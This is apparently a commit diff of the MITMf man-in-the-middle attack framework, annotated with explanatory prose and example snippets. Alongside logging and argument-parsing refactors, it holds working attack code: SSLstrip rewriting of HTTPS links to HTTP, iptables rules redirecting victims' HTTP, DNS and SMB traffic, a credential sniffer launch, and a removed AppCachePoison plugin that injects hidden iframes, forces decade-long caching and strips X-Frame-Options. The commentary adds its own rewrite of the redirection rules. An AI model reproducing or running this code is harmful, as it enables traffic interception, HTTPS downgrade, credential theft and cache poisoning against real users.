                 dregex = re.compile("({})".format("|".join(map(re.escape, sustitucion.keys()))))
                 data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data)

@@ -240,11 +243,11 @@ class ServerConnection(HTTPClient):
             for match in iterator:
                 url = match.group()

-                mitmf_logger.debug("[ServerConnection] Found secure reference: " + url)
+                log.debug("[ServerConnection] Found secure reference: " + url)

                 url = url.replace('https://', 'http://', 1)
                 url = url.replace('&amp;', '&')
-                self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
+                self.urlMonitor.addSecureLink(self.clientInfo['clientip'], url)

             data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data)
             return re.sub(ServerConnection.urlType, 'http://', data)
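This is the core of the logging revamp: instead of formatting the client IP, browser, and OS into every message by hand, ServerConnection now builds a `clientInfo` dict once in `connectionMade()` and passes it to each call via the standard library's `extra=` mechanism, with a Formatter that references the custom fields. A minimal standalone demo of that mechanism (the "demo" logger name and sample values are illustrative):

```python
# Minimal standalone demo of logging with custom Formatter fields filled in via extra=.
import logging
import sys

formatter = logging.Formatter(
    "%(asctime)s %(clientip)s [type:%(browser)s-%(browserv)s os:%(clientos)s] %(message)s",
    datefmt="%Y-%m-%d %H:%M:%S")

handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(formatter)

log = logging.getLogger("demo")
log.addHandler(handler)
log.setLevel(logging.INFO)

clientInfo = {"clientip": "192.168.1.10", "browser": "Firefox", "browserv": "35", "clientos": "Windows"}

# Every custom field referenced by the formatter must be present in extra,
# otherwise the logging module fails while formatting the record.
log.info("www.example.com", extra=clientInfo)
```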
@@ -17,9 +17,10 @@
 #

 import logging

 from twisted.internet.protocol import ClientFactory

-mitmf_logger = logging.getLogger('mimtf')
+log = logging.getLogger('mitmf')

 class ServerConnectionFactory(ClientFactory):

@@ -34,12 +35,12 @@ class ServerConnectionFactory(ClientFactory):
         return self.protocol(self.command, self.uri, self.postData, self.headers, self.client)

     def clientConnectionFailed(self, connector, reason):
-        mitmf_logger.debug("[ServerConnectionFactory] Server connection failed.")
+        log.debug("[ServerConnectionFactory] Server connection failed.")

         destination = connector.getDestination()

         if (destination.port != 443):
-            mitmf_logger.debug("[ServerConnectionFactory] Retrying via SSL")
+            log.debug("[ServerConnectionFactory] Retrying via SSL")
             self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443)
         else:
             try:
@@ -18,9 +18,10 @@

 import re, os
 import logging

 from core.configwatcher import ConfigWatcher

-mitmf_logger = logging.getLogger('mimtf')
+log = logging.getLogger('mitmf')

 class URLMonitor:

@@ -57,7 +58,7 @@ class URLMonitor:

     #This is here because I'm lazy
     def getResolverPort(self):
-        return int(ConfigWatcher.getInstance().getConfig()['MITMf']['DNS']['port'])
+        return int(ConfigWatcher().config['MITMf']['DNS']['port'])

     def isSecureLink(self, client, url):
         for expression in URLMonitor.javascriptTrickery:

@@ -78,7 +79,7 @@ class URLMonitor:
             s.add(to_url)
             return
         url_set = set([from_url, to_url])
-        mitmf_logger.debug("[URLMonitor][AppCachePoison] Set redirection: {}".format(url_set))
+        log.debug("[URLMonitor][AppCachePoison] Set redirection: {}".format(url_set))
         self.redirects.append(url_set)

     def getRedirectionSet(self, url):

@@ -119,7 +120,7 @@ class URLMonitor:
         else:
             self.sustitucion[host] = "web"+host
             self.real["web"+host] = host
-            mitmf_logger.debug("[URLMonitor][HSTS] SSL host ({}) tokenized ({})".format(host, self.sustitucion[host]))
+            log.debug("[URLMonitor][HSTS] SSL host ({}) tokenized ({})".format(host, self.sustitucion[host]))

         url = 'http://' + host + path

@@ -155,14 +156,14 @@ class URLMonitor:
         return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))

     def URLgetRealHost(self, host):
-        mitmf_logger.debug("[URLMonitor][HSTS] Parsing host: {}".format(host))
+        log.debug("[URLMonitor][HSTS] Parsing host: {}".format(host))

         self.updateHstsConfig()

         if self.real.has_key(host):
-            mitmf_logger.debug("[URLMonitor][HSTS] Found host in list: {}".format(self.real[host]))
+            log.debug("[URLMonitor][HSTS] Found host in list: {}".format(self.real[host]))
             return self.real[host]

         else:
-            mitmf_logger.debug("[URLMonitor][HSTS] Host not in list: {}".format(host))
+            log.debug("[URLMonitor][HSTS] Host not in list: {}".format(host))
             return host
@@ -25,22 +25,23 @@ import logging
 import re
 import sys

-logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
-from scapy.all import get_if_addr, get_if_hwaddr
 from core.sergioproxy.ProxyPlugins import ProxyPlugins

-mitmf_logger = logging.getLogger('mitmf')
+logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
+from scapy.all import get_if_addr, get_if_hwaddr
+
+log = logging.getLogger('mitmf')

 def shutdown(message=None):
     for plugin in ProxyPlugins.getInstance().plist:
-        plugin.finish()
+        plugin.on_shutdown()
     sys.exit(message)

 class SystemConfig:

     @staticmethod
     def setIpForwarding(value):
-        mitmf_logger.debug("[Utils] Setting ip forwarding to {}".format(value))
+        log.debug("[Utils] Setting ip forwarding to {}".format(value))
         with open('/proc/sys/net/ipv4/ip_forward', 'w') as file:
             file.write(str(value))
             file.close()

@@ -53,7 +54,7 @@ class SystemConfig:
                 shutdown("[Utils] Interface {} does not have an assigned IP address".format(interface))

             return ip_address
-        except Exception, e:
+        except Exception as e:
             shutdown("[Utils] Error retrieving IP address from {}: {}".format(interface, e))

     @staticmethod

@@ -81,23 +82,23 @@ class IpTables:
         return IpTables._instance

     def Flush(self):
-        mitmf_logger.debug("[Utils] Flushing iptables")
+        log.debug("[Utils] Flushing iptables")
         os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
         self.dns = False
         self.http = False

     def HTTP(self, http_redir_port):
-        mitmf_logger.debug("[Utils] Setting iptables HTTP redirection rule from port 80 to {}".format(http_redir_port))
+        log.debug("[Utils] Setting iptables HTTP redirection rule from port 80 to {}".format(http_redir_port))
         os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port {}'.format(http_redir_port))
         self.http = True

     def DNS(self, dns_redir_port):
-        mitmf_logger.debug("[Utils] Setting iptables DNS redirection rule from port 53 to {}".format(dns_redir_port))
+        log.debug("[Utils] Setting iptables DNS redirection rule from port 53 to {}".format(dns_redir_port))
         os.system('iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port {}'.format(dns_redir_port))
         self.dns = True

     def SMB(self, smb_redir_port):
-        mitmf_logger.debug("[Utils] Setting iptables SMB redirection rule from port 445 to {}".format(smb_redir_port))
+        log.debug("[Utils] Setting iptables SMB redirection rule from port 445 to {}".format(smb_redir_port))
         os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 445 -j REDIRECT --to-port {}'.format(smb_redir_port))
         self.smb = True

@@ -163,6 +164,6 @@ class Banners:
    ╚═╝     ╚═╝╚═╝   ╚═╝   ╚═╝     ╚═╝╚═╝
    """

-    def printBanner(self):
+    def get_banner(self):
         banners = [self.banner1, self.banner2, self.banner3, self.banner4, self.banner5]
-        print random.choice(banners)
+        return random.choice(banners)
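The IpTables helpers only swap the logger name; they still shell out to iptables to redirect ports 80, 53, and 445 to the local proxy listeners. A sketch of the same rules using subprocess instead of os.system (the helper names are illustrative; root privileges are assumed):

```python
# Equivalent of IpTables.HTTP()/DNS()/SMB()/Flush() using subprocess (root required).
import subprocess

def redirect_port(proto, dport, to_port):
    # NAT PREROUTING rule: send traffic destined for dport to the local to_port instead
    subprocess.check_call(['iptables', '-t', 'nat', '-A', 'PREROUTING',
                           '-p', proto, '--destination-port', str(dport),
                           '-j', 'REDIRECT', '--to-port', str(to_port)])

def flush():
    subprocess.check_call('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X',
                          shell=True)

# Example: send client HTTP traffic to the sslstrip listener on port 10000
# redirect_port('tcp', 80, 10000)
```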
@@ -1 +1 @@
-Subproject commit 0bd3429e6775395c3522046ab21193a36ab2e0fe
+Subproject commit 6fcff6bdb511ca306ec9ad29872342086714dd1d
158
mitmf.py
158
mitmf.py
|
@ -18,158 +18,102 @@
|
||||||
# USA
|
# USA
|
||||||
#
|
#
|
||||||
|
|
||||||
|
import logging
|
||||||
import argparse
|
import argparse
|
||||||
import sys
|
import sys
|
||||||
import os
|
import os
|
||||||
import logging
|
|
||||||
import threading
|
import threading
|
||||||
|
|
||||||
from twisted.web import http
|
from twisted.web import http
|
||||||
from twisted.internet import reactor
|
from twisted.internet import reactor
|
||||||
from core.sslstrip.CookieCleaner import CookieCleaner
|
|
||||||
from core.sergioproxy.ProxyPlugins import ProxyPlugins
|
|
||||||
from core.utils import Banners, SystemConfig, shutdown
|
from core.utils import Banners, SystemConfig, shutdown
|
||||||
|
from core.logger import logger
|
||||||
|
|
||||||
from plugins import *
|
from plugins import *
|
||||||
|
|
||||||
Banners().printBanner()
|
print Banners().get_banner()
|
||||||
|
|
||||||
if os.geteuid() != 0:
|
if os.geteuid() != 0:
|
||||||
sys.exit("[-] When man-in-the-middle you want, run as r00t you will, hmm?")
|
sys.exit("[-] The derp is strong with this one")
|
||||||
|
|
||||||
mitmf_version = "0.9.7"
|
parser = argparse.ArgumentParser(description="MITMf v0.9.8 - 'The Dark Side'", version="0.9.8 - 'The Dark Side'", usage='mitmf.py -i interface [mitmf options] [plugin name] [plugin options]', epilog="Use wisely, young Padawan.")
|
||||||
sslstrip_version = "0.9"
|
|
||||||
sergio_version = "0.2.1"
|
|
||||||
|
|
||||||
parser = argparse.ArgumentParser(description="MITMf v{} - Framework for MITM attacks".format(mitmf_version), version=mitmf_version, usage='mitmf.py -i interface [mitmf options] [plugin name] [plugin options]', epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@')
|
|
||||||
|
|
||||||
#add MITMf options
|
#add MITMf options
|
||||||
mgroup = parser.add_argument_group("MITMf", "Options for MITMf")
|
mgroup = parser.add_argument_group("MITMf", "Options for MITMf")
|
||||||
mgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
|
mgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
|
||||||
mgroup.add_argument("-i", "--interface", required=True, type=str, metavar="interface" ,help="Interface to listen on")
|
mgroup.add_argument("-i", dest='interface', required=True, type=str, help="Interface to listen on")
|
||||||
mgroup.add_argument("-c", "--config-file", dest='configfile', type=str, default="./config/mitmf.conf", metavar='configfile', help="Specify config file to use")
|
mgroup.add_argument("-c", dest='configfile', metavar="CONFIG_FILE", type=str, default="./config/mitmf.conf", help="Specify config file to use")
|
||||||
mgroup.add_argument('-m', '--manual-iptables', dest='manualiptables', action='store_true', default=False, help='Do not setup iptables or flush them automatically')
|
mgroup.add_argument('-m', '--manual-iptables', dest='manualiptables', action='store_true', default=False, help='Do not setup iptables or flush them automatically')
|
||||||
|
|
||||||
#add sslstrip options
|
#Add sslstrip options
|
||||||
sgroup = parser.add_argument_group("SSLstrip", "Options for SSLstrip library")
|
sgroup = parser.add_argument_group("SSLstrip", "Options for SSLstrip library")
|
||||||
slogopts = sgroup.add_mutually_exclusive_group()
|
slogopts = sgroup.add_mutually_exclusive_group()
|
||||||
slogopts.add_argument("-p", "--post", action="store_true",help="Log only SSL POSTs. (default)")
|
sgroup.add_argument("-p", "--preserve-cache", action="store_true", help="Don't kill client/server caching")
|
||||||
slogopts.add_argument("-s", "--ssl", action="store_true", help="Log all SSL traffic to and from server.")
|
sgroup.add_argument("-l", dest='listen_port', type=int, metavar="PORT", default=10000, help="Port to listen on (default 10000)")
|
||||||
slogopts.add_argument("-a", "--all", action="store_true", help="Log all SSL and HTTP traffic to and from server.")
|
|
||||||
sgroup.add_argument("-l", "--listen", type=int, metavar="port", default=10000, help="Port to listen on (default 10000)")
|
|
||||||
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
|
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
|
||||||
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
|
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
|
||||||
|
|
||||||

-#Initialize plugins
-plugin_classes = plugin.Plugin.__subclasses__()
-
-plugins = []
-try:
-    for p in plugin_classes:
-        plugins.append(p())
-except Exception as e:
-    print "[-] Failed to load plugin class {}: {}".format(p, e)
-
-arg_dict = dict() #dict containing a plugin's optname with it's relative options
-
-#Give subgroup to each plugin with options
-try:
-    for p in plugins:
-
-        if p.desc == "":
-            sgroup = parser.add_argument_group(p.name,"Options for {}.".format(p.name))
-        else:
-            sgroup = parser.add_argument_group(p.name, p.desc)
-
-        sgroup.add_argument("--{}".format(p.optname), action="store_true",help="Load plugin {}".format(p.name))
-
-        if p.has_opts:
-            p.pluginOptions(sgroup)
-
-        arg_dict[p.optname] = vars(sgroup)['_group_actions']
-
-except NotImplementedError:
-    sys.exit("[-] {} plugin claimed option support, but didn't have it.".format(p.name))
-
-if len(sys.argv) is 1:
+#Initialize plugins and pass them the parser NameSpace object
+plugins = [plugin(parser) for plugin in plugin.Plugin.__subclasses__()]
+
+if len(sys.argv) == 1:
     parser.print_help()
     sys.exit(1)
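
Both the old loader (instantiating each Plugin subclass and calling pluginOptions()) and the new one (passing the parser straight into the constructor) assume that every plugin exposes the same small interface. A minimal sketch of that interface, with the attribute names taken from the plugins removed later in this commit; the ExamplePlugin class and its --example-setting flag are purely illustrative:

    from plugins.plugin import Plugin

    class ExamplePlugin(Plugin):
        name     = "Example"   # printed in the startup tree
        optname  = "example"   # exposed on the command line as --example
        desc     = "Illustrative plugin, not part of the framework"
        version  = "0.1"
        has_opts = True        # tells the loader to ask for extra arguments

        def initialize(self, options):
            '''Receives the parsed argparse namespace when --example is passed'''
            self.options = options

        def pluginOptions(self, options):
            '''Registers this plugin's own flags inside its argparse subgroup'''
            options.add_argument('--example-setting', dest='example_setting', type=str,
                                 default=None, help='Hypothetical plugin-specific option')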

-args = parser.parse_args()
+options = parser.parse_args()

-# Definitely a better way to do this, will need to clean this up in the future
-# Checks to see if we called a plugin's options without first invoking the actual plugin
-for plugin, options in arg_dict.iteritems():
-    if vars(args)[plugin] is False:
-        for option in options:
-            if vars(args)[option.dest]:
-                sys.exit("[-] Called plugin options without invoking the actual plugin (--{})".format(plugin))
-
-#check to see if we supplied a valid interface
-myip = SystemConfig.getIP(args.interface)
-mymac = SystemConfig.getMAC(args.interface)
-
-#Start logging
-log_level = logging.__dict__[args.log_level.upper()]
-
-logging.basicConfig(level=log_level, format="%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
-logFormatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
-mitmf_logger = logging.getLogger('mitmf')
-fileHandler = logging.FileHandler("./logs/mitmf.log")
-fileHandler.setFormatter(logFormatter)
-mitmf_logger.addHandler(fileHandler)
+#Check to see if we supplied a valid interface, pass the IP and MAC to the NameSpace object
+options.ip = SystemConfig.getIP(options.interface)
+options.mac = SystemConfig.getMAC(options.interface)
+
+#Set the log level
+logger().log_level = logging.__dict__[options.log_level.upper()]
+formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
+log = logger().setup_logger('mitmf', formatter)
+
+from core.sslstrip.CookieCleaner import CookieCleaner
+from core.sergioproxy.ProxyPlugins import ProxyPlugins
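
The new logging calls go through a logger() helper that lives in core/logger.py and is not shown in this hunk, so its internals are an assumption here; a rough sketch that only matches the calling convention above (set log_level once, then setup_logger(name, formatter) returns a configured logging.Logger writing to ./logs/mitmf.log and the console):

    import logging

    class logger(object):
        '''Sketch only: the real implementation is in core/logger.py (not in this diff).'''

        _log_level = logging.INFO           # shared across instances so logger().log_level = x sticks

        @property
        def log_level(self):
            return logger._log_level

        @log_level.setter
        def log_level(self, value):
            logger._log_level = value

        def setup_logger(self, name, formatter, logfile='./logs/mitmf.log'):
            # mirrors the old basicConfig + FileHandler behaviour that this commit replaces
            fileHandler = logging.FileHandler(logfile)
            fileHandler.setFormatter(formatter)

            streamHandler = logging.StreamHandler()
            streamHandler.setFormatter(formatter)

            log = logging.getLogger(name)
            log.setLevel(self.log_level)
            log.addHandler(fileHandler)
            log.addHandler(streamHandler)
            return log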

-#####################################################################################################
-
-#All our options should be loaded now, initialize the plugins
-print "[*] MITMf v{} online... initializing plugins".format(mitmf_version)
-
-for p in plugins:
-
-    #load only the plugins that have been called at the command line
-    if vars(args)[p.optname] is True:
-
-        print "|_ {} v{}".format(p.name, p.version)
-        if p.tree_info:
-            for line in xrange(0, len(p.tree_info)):
-                print "| |_ {}".format(p.tree_info.pop())
-
-        p.initialize(args)
-
-        if p.tree_info:
-            for line in xrange(0, len(p.tree_info)):
-                print "| |_ {}".format(p.tree_info.pop())
-
-        ProxyPlugins.getInstance().addPlugin(p)
-
-#Plugins are ready to go, let's rock & roll

 from core.sslstrip.StrippingProxy import StrippingProxy
 from core.sslstrip.URLMonitor import URLMonitor

-URLMonitor.getInstance().setFaviconSpoofing(args.favicon)
-CookieCleaner.getInstance().setEnabled(args.killsessions)
+URLMonitor.getInstance().setFaviconSpoofing(options.favicon)
+CookieCleaner.getInstance().setEnabled(options.killsessions)

 strippingFactory = http.HTTPFactory(timeout=10)
 strippingFactory.protocol = StrippingProxy

-reactor.listenTCP(args.listen, strippingFactory)
+reactor.listenTCP(options.listen_port, strippingFactory)

-for p in ProxyPlugins.getInstance().plist:
-    p.pluginReactor(strippingFactory) #we pass the default strippingFactory, so the plugins can use it
-    p.startConfigWatch()
-
-    if hasattr(p, 'startThread'):
-        t = threading.Thread(name='{}-Thread'.format(p.name), target=p.startThread)
-        t.setDaemon(True)
-        t.start()
+#All our options should be loaded now, start initializing the plugins
+print "[*] MITMf v0.9.8 - 'The Dark Side'"
+
+for plugin in plugins:
+
+    #load only the plugins that have been called at the command line
+    if vars(options)[plugin.optname] is True:
+
+        print "|_ {} v{}".format(plugin.name, plugin.version)
+        if plugin.tree_info:
+            for line in xrange(0, len(plugin.tree_info)):
+                print "| |_ {}".format(plugin.tree_info.pop())
+
+        plugin.initialize(options)
+
+        if plugin.tree_info:
+            for line in xrange(0, len(plugin.tree_info)):
+                print "| |_ {}".format(plugin.tree_info.pop())
+
+        ProxyPlugins.getInstance().addPlugin(plugin)
+
+        plugin.reactor(strippingFactory)
+        plugin.setup_logger()
+        plugin.start_config_watch()

 print "|"
-print "|_ Sergio-Proxy v{} online".format(sergio_version)
-print "|_ SSLstrip v{} by Moxie Marlinspike online".format(sslstrip_version)
+print "|_ Sergio-Proxy v0.2.1 online"
+print "|_ SSLstrip v0.9 by Moxie Marlinspike online"

 #Start Net-Creds
 from core.netcreds.NetCreds import NetCreds
-NetCreds().start(args.interface, myip)
+NetCreds().start(options.interface)
 print "|_ Net-Creds v{} online".format(NetCreds.version)

 #Start DNSChef

@@ -184,8 +128,8 @@ print "|_ DNSChef v{} online".format(DNSChef.version)

 #Start the SMB server
 from core.servers.smb.SMBserver import SMBserver
-print "|_ SMB server online [Mode: {}] (Impacket {}) \n".format(SMBserver.getInstance().server_type, SMBserver.getInstance().impacket_ver)
 SMBserver.getInstance().start()
+print "|_ SMB server online [Mode: {}] (Impacket {}) \n".format(SMBserver.getInstance().server_type, SMBserver.getInstance().impacket_ver)

 #start the reactor
 reactor.run()
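
With the reworked arguments, a typical run now looks roughly like this (the interface name and the plugin flag are placeholders, not taken from the diff):

    python mitmf.py -i eth0 --log-level debug --<plugin> [plugin options]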

other_setup.sh: 0 changes (Normal file → Executable file)
@@ -1,203 +0,0 @@
|
||||||
#!/usr/bin/env python2.7
|
|
||||||
|
|
||||||
# Copyright (c) 2014-2016 Krzysztof Kotowicz, Marcello Salvati
|
|
||||||
#
|
|
||||||
# This program is free software; you can redistribute it and/or
|
|
||||||
# modify it under the terms of the GNU General Public License as
|
|
||||||
# published by the Free Software Foundation; either version 3 of the
|
|
||||||
# License, or (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful, but
|
|
||||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
||||||
# General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program; if not, write to the Free Software
|
|
||||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
||||||
# USA
|
|
||||||
#
|
|
||||||
|
|
||||||
import logging
|
|
||||||
import re
|
|
||||||
import os.path
|
|
||||||
import time
|
|
||||||
import sys
|
|
||||||
|
|
||||||
from datetime import date
|
|
||||||
from plugins.plugin import Plugin
|
|
||||||
from core.sslstrip.URLMonitor import URLMonitor
|
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger("mitmf")
|
|
||||||
|
|
||||||
class AppCachePlugin(Plugin):
|
|
||||||
name = "AppCachePoison"
|
|
||||||
optname = "appoison"
|
|
||||||
desc = "Performs App Cache Poisoning attacks"
|
|
||||||
version = "0.3"
|
|
||||||
has_opts = False
|
|
||||||
|
|
||||||
def initialize(self, options):
|
|
||||||
self.options = options
|
|
||||||
self.mass_poisoned_browsers = []
|
|
||||||
self.urlMonitor = URLMonitor.getInstance()
|
|
||||||
|
|
||||||
self.urlMonitor.setAppCachePoisoning()
|
|
||||||
|
|
||||||
def serverResponse(self, response, request, data):
|
|
||||||
|
|
||||||
#This code was literally copied + pasted from Koto's sslstrip fork, def need to clean this up in the near future
|
|
||||||
|
|
||||||
self.app_config = self.config['AppCachePoison'] # so we reload the config on each request
|
|
||||||
url = request.client.uri
|
|
||||||
req_headers = request.client.getAllHeaders()
|
|
||||||
headers = request.client.responseHeaders
|
|
||||||
ip = request.client.getClientIP()
|
|
||||||
|
|
||||||
#########################################################################
|
|
||||||
|
|
||||||
if "enable_only_in_useragents" in self.app_config:
|
|
||||||
regexp = self.app_config["enable_only_in_useragents"]
|
|
||||||
if regexp and not re.search(regexp,req_headers["user-agent"]):
|
|
||||||
mitmf_logger.info("{} [{}] Tampering disabled in this useragent ({})".format(ip, self.name, req_headers["user-agent"]))
|
|
||||||
return {'response': response, 'request': request, 'data': data}
|
|
||||||
|
|
||||||
urls = self.urlMonitor.getRedirectionSet(url)
|
|
||||||
mitmf_logger.debug("{} [{}] Got redirection set: {}".format(ip,self.name, urls))
|
|
||||||
(name,s,element,url) = self.getSectionForUrls(urls)
|
|
||||||
|
|
||||||
if s is False:
|
|
||||||
data = self.tryMassPoison(url, data, headers, req_headers, ip)
|
|
||||||
return {'response': response, 'request': request, 'data': data}
|
|
||||||
|
|
||||||
mitmf_logger.info("{} [{}] Found URL {} in section {}".format(ip, self.name, url, name))
|
|
||||||
p = self.getTemplatePrefix(s)
|
|
||||||
|
|
||||||
if element == 'tamper':
|
|
||||||
mitmf_logger.info("{} [{}] Poisoning tamper URL with template {}".format(ip, self.name, p))
|
|
||||||
if os.path.exists(p + '.replace'): # replace whole content
|
|
||||||
f = open(p + '.replace','r')
|
|
||||||
data = self.decorate(f.read(), s)
|
|
||||||
f.close()
|
|
||||||
|
|
||||||
elif os.path.exists(p + '.append'): # append file to body
|
|
||||||
f = open(p + '.append','r')
|
|
||||||
appendix = self.decorate(f.read(), s)
|
|
||||||
f.close()
|
|
||||||
# append to body
|
|
||||||
data = re.sub(re.compile("</body>",re.IGNORECASE),appendix + "</body>", data)
|
|
||||||
|
|
||||||
# add manifest reference
|
|
||||||
data = re.sub(re.compile("<html",re.IGNORECASE),"<html manifest=\"" + self.getManifestUrl(s)+"\"", data)
|
|
||||||
|
|
||||||
elif element == "manifest":
|
|
||||||
mitmf_logger.info("{} [{}] Poisoning manifest URL".format(ip, self.name))
|
|
||||||
data = self.getSpoofedManifest(url, s)
|
|
||||||
headers.setRawHeaders("Content-Type", ["text/cache-manifest"])
|
|
||||||
|
|
||||||
elif element == "raw": # raw resource to modify, it does not have to be html
|
|
||||||
mitmf_logger.info("{} [{}] Poisoning raw URL".format(ip, self.name))
|
|
||||||
if os.path.exists(p + '.replace'): # replace whole content
|
|
||||||
f = open(p + '.replace','r')
|
|
||||||
data = self.decorate(f.read(), s)
|
|
||||||
f.close()
|
|
||||||
|
|
||||||
elif os.path.exists(p + '.append'): # append file to body
|
|
||||||
f = open(p + '.append','r')
|
|
||||||
appendix = self.decorate(f.read(), s)
|
|
||||||
f.close()
|
|
||||||
# append to response body
|
|
||||||
data += appendix
|
|
||||||
|
|
||||||
self.cacheForFuture(headers)
|
|
||||||
self.removeDangerousHeaders(headers)
|
|
||||||
return {'response': response, 'request': request, 'data': data}
|
|
||||||
|
|
||||||
def tryMassPoison(self, url, data, headers, req_headers, ip):
|
|
||||||
browser_id = ip + req_headers.get("user-agent", "")
|
|
||||||
|
|
||||||
if not 'mass_poison_url_match' in self.app_config: # no url
|
|
||||||
return data
|
|
||||||
if browser_id in self.mass_poisoned_browsers: #already poisoned
|
|
||||||
return data
|
|
||||||
if not headers.hasHeader('content-type') or not re.search('html(;|$)', headers.getRawHeaders('content-type')[0]): #not HTML
|
|
||||||
return data
|
|
||||||
if 'mass_poison_useragent_match' in self.app_config and not "user-agent" in req_headers:
|
|
||||||
return data
|
|
||||||
if not re.search(self.app_config['mass_poison_useragent_match'], req_headers['user-agent']): #different UA
|
|
||||||
return data
|
|
||||||
if not re.search(self.app_config['mass_poison_url_match'], url): #different url
|
|
||||||
return data
|
|
||||||
|
|
||||||
mitmf_logger.debug("[{}] Adding AppCache mass poison for URL {}, id {}".format(self.name, url, browser_id))
|
|
||||||
appendix = self.getMassPoisonHtml()
|
|
||||||
data = re.sub(re.compile("</body>",re.IGNORECASE),appendix + "</body>", data)
|
|
||||||
self.mass_poisoned_browsers.append(browser_id) # mark to avoid mass spoofing for this ip
|
|
||||||
return data
|
|
||||||
|
|
||||||
def getMassPoisonHtml(self):
|
|
||||||
html = "<div style=\"position:absolute;left:-100px\">"
|
|
||||||
for i in self.app_config:
|
|
||||||
if isinstance(self.app_config[i], dict):
|
|
||||||
if self.app_config[i].has_key('tamper_url') and not self.app_config[i].get('skip_in_mass_poison', False):
|
|
||||||
html += "<iframe sandbox=\"\" style=\"opacity:0;visibility:hidden\" width=\"1\" height=\"1\" src=\"" + self.app_config[i]['tamper_url'] + "\"></iframe>"
|
|
||||||
|
|
||||||
return html + "</div>"
|
|
||||||
|
|
||||||
def cacheForFuture(self, headers):
|
|
||||||
ten_years = 315569260
|
|
||||||
headers.setRawHeaders("Cache-Control",["max-age="+str(ten_years)])
|
|
||||||
headers.setRawHeaders("Last-Modified",["Mon, 29 Jun 1998 02:28:12 GMT"]) # it was modifed long ago, so is most likely fresh
|
|
||||||
in_ten_years = date.fromtimestamp(time.time() + ten_years)
|
|
||||||
headers.setRawHeaders("Expires",[in_ten_years.strftime("%a, %d %b %Y %H:%M:%S GMT")])
|
|
||||||
|
|
||||||
def removeDangerousHeaders(self, headers):
|
|
||||||
headers.removeHeader("X-Frame-Options")
|
|
||||||
|
|
||||||
def getSpoofedManifest(self, url, section):
|
|
||||||
p = self.getTemplatePrefix(section)
|
|
||||||
if not os.path.exists(p+'.manifest'):
|
|
||||||
p = self.getDefaultTemplatePrefix()
|
|
||||||
|
|
||||||
f = open(p + '.manifest', 'r')
|
|
||||||
manifest = f.read()
|
|
||||||
f.close()
|
|
||||||
return self.decorate(manifest, section)
|
|
||||||
|
|
||||||
def decorate(self, content, section):
|
|
||||||
for i in section:
|
|
||||||
content = content.replace("%%"+i+"%%", section[i])
|
|
||||||
return content
|
|
||||||
|
|
||||||
def getTemplatePrefix(self, section):
|
|
||||||
if section.has_key('templates'):
|
|
||||||
return self.app_config['templates_path'] + '/' + section['templates']
|
|
||||||
|
|
||||||
return self.getDefaultTemplatePrefix()
|
|
||||||
|
|
||||||
def getDefaultTemplatePrefix(self):
|
|
||||||
return self.app_config['templates_path'] + '/default'
|
|
||||||
|
|
||||||
def getManifestUrl(self, section):
|
|
||||||
return section.get("manifest_url",'/robots.txt')
|
|
||||||
|
|
||||||
def getSectionForUrls(self, urls):
|
|
||||||
for url in urls:
|
|
||||||
for i in self.app_config:
|
|
||||||
if isinstance(self.app_config[i], dict): #section
|
|
||||||
section = self.app_config[i]
|
|
||||||
name = i
|
|
||||||
|
|
||||||
if section.get('tamper_url',False) == url:
|
|
||||||
return (name, section, 'tamper',url)
|
|
||||||
|
|
||||||
if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url):
|
|
||||||
return (name, section, 'tamper',url)
|
|
||||||
|
|
||||||
if section.get('manifest_url',False) == url:
|
|
||||||
return (name, section, 'manifest',url)
|
|
||||||
|
|
||||||
if section.get('raw_url',False) == url:
|
|
||||||
return (name, section, 'raw',url)
|
|
||||||
|
|
||||||
return (None, False,'',urls.copy().pop())
|
|
|
@@ -1,122 +0,0 @@
|
||||||
#!/usr/bin/env python2.7
|
|
||||||
|
|
||||||
# Copyright (c) 2014-2016 Marcello Salvati
|
|
||||||
#
|
|
||||||
# This program is free software; you can redistribute it and/or
|
|
||||||
# modify it under the terms of the GNU General Public License as
|
|
||||||
# published by the Free Software Foundation; either version 3 of the
|
|
||||||
# License, or (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful, but
|
|
||||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
||||||
# General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program; if not, write to the Free Software
|
|
||||||
